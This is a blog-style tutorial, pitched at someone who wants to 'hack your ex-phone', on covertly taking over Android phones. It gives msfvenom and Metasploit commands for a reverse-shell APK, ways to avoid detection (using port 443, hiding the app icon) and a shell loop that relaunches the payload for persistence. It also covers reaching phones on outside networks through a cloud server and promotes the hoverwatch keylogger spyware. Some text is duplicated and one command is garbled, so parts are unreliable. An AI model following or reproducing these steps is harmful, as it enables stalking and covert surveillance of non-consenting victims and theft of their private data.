Do you want to learn android pen testing or just want to hack your ex-phone? I will explain everything from scratch. You did not need any previous knowledge for this.
Just read this post carefully with patience.
After reading this post, you can hack any android phone (but don’t expect any magic from me).
I will post 2-3 on Android hacking
You will learn
If you are a beginner then read these article before reading this article. Otherwise, you will not properly understand this article.
I am assuming you have read kali Linux tutorials for beginners. In Kali Linux, there is tool known as Metasploit
Metasploit is the framework where all type of pen testing tool is present. You can hack anything like window pc, server, android, etc. If you are beginner check out the Metasploit tutorial for beginners.
Note: I’m using same wifi network. In the end, I will show you How to hack the device that is not on your network?. Keep reading.
First of all, we create a payload (you can call it app) then install it on his/her phone. When your victim opens it you his device will be in your control.
Here is the command to run in the terminal
msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk
This command will create an app in the current directory with the name of appname. Off course you can change it to anything. Let me explain this
-p for payload. I have reverse_tcp because it bypasses all kind of firewall rules.
LHOST: Is your local IP address. Type ifconfig to find your IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack android phones that are outside of your network.
IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack android phones that are outside of your network.
LPORT: for selecting the port number. I have chosen 4444 because it is free. You can choose anyone but in the particular case, I will recommend you to chose 443. It is the port number for https. So in any case expert it scanning phone he/she will ignore this because it is the port for https (it should open). If he/she see port 4444 is open, then he can check the phone.
o For saving app, you can use > too. It will keep apk in the current directory.
After that in terminal type msfconsole. It will launch Metasploit.
Set your exploit to multi handler. here is the command
(if you are confused by this command to read Metasploit tutorial for a beginner )
Now we need to set the payload
set payload android/meterpreter/reverse_tcp
Show options command will show all the options. As you can see in the screenshot, we need to set LHOST (mean local IP address)
set LHOST 192.168.43.60
This is my IP your IP different than this. I show you above how to find the local Ip address
Port number should be same as msfvenom. Mine is 443
set LPORT 443
Your system is ready for hacking the android phone.
App that you created in the first step install it in your phone (for testing)
open it (you will get nothing)
But on the computer side, you got the meterpreter session. Mean you have hacked this device :).
In my case, I don’t know why I am facing this error
Don’t worry run this command
It will show output similar to like it. Because I open the app three times so I got 3 sessions.
In my case I got 3 sessions I don’t not in your case but we will select the last sessions. Command
sessions -i 3
You got meterpreter sessions 😎
type help to see what can you do.
You can do anything like taking screenshots, call details, keylogger, upload and download files, etc.
These are a lot commands here are some samples
You can download or upload files too if you know Linux commands
Moral: you can do anything.
If you send file this. He/She will definitely uninstall it because it shows nothing. You hide the app icon using hide_app_icon command.
But if user clean recent apps then our connection will be lhost.
To bypass this problem follow these steps.
Open any text editor and copy paste these codes.
#!/bin/bash while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done
save it with startagain.sh
Make sure extension is .sh
When you got meterpreter session then run these commands
You will like this on uploading script
This means you have uploaded script successfully. Run these commands to execute script.
after 5-10 seconds press ctrl+c like the screenshot
Don’t worry we stop shell not script.
As you can see in the screenshot I got New meterpreter sessions after every 20 seconds.
Until you will not reboot your phone you will continuously get meterpreter sessions after every 20 seconds.
How to hack the device that is not in your network?
You can port forward your router then use your public IP address (search on google my public IP). In the case, if you are using mobile data then buy a web server.
How to get web server free?
Google cloud provide you free web server with the amount of $300. You can use this money to install Linux distribution (I think Debian coast $10/month). Install Kali Linux and do the same process just change IP to your public IP (Google will provide you).
Make sure you have the credit card for making billing.
For this, we will use a unique app known as keylogger apps. It will record everything typed by victim keyboard and send to you. There are many keylogger apps available for Android, But I will use hoverwatch.
This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device.
There is the only one limitation in this app that it will give you free trial version up to 3 days only mean you can use this app free for just three days. Plans are starting from $8.33/month for a single device.
How to enable hoverwatch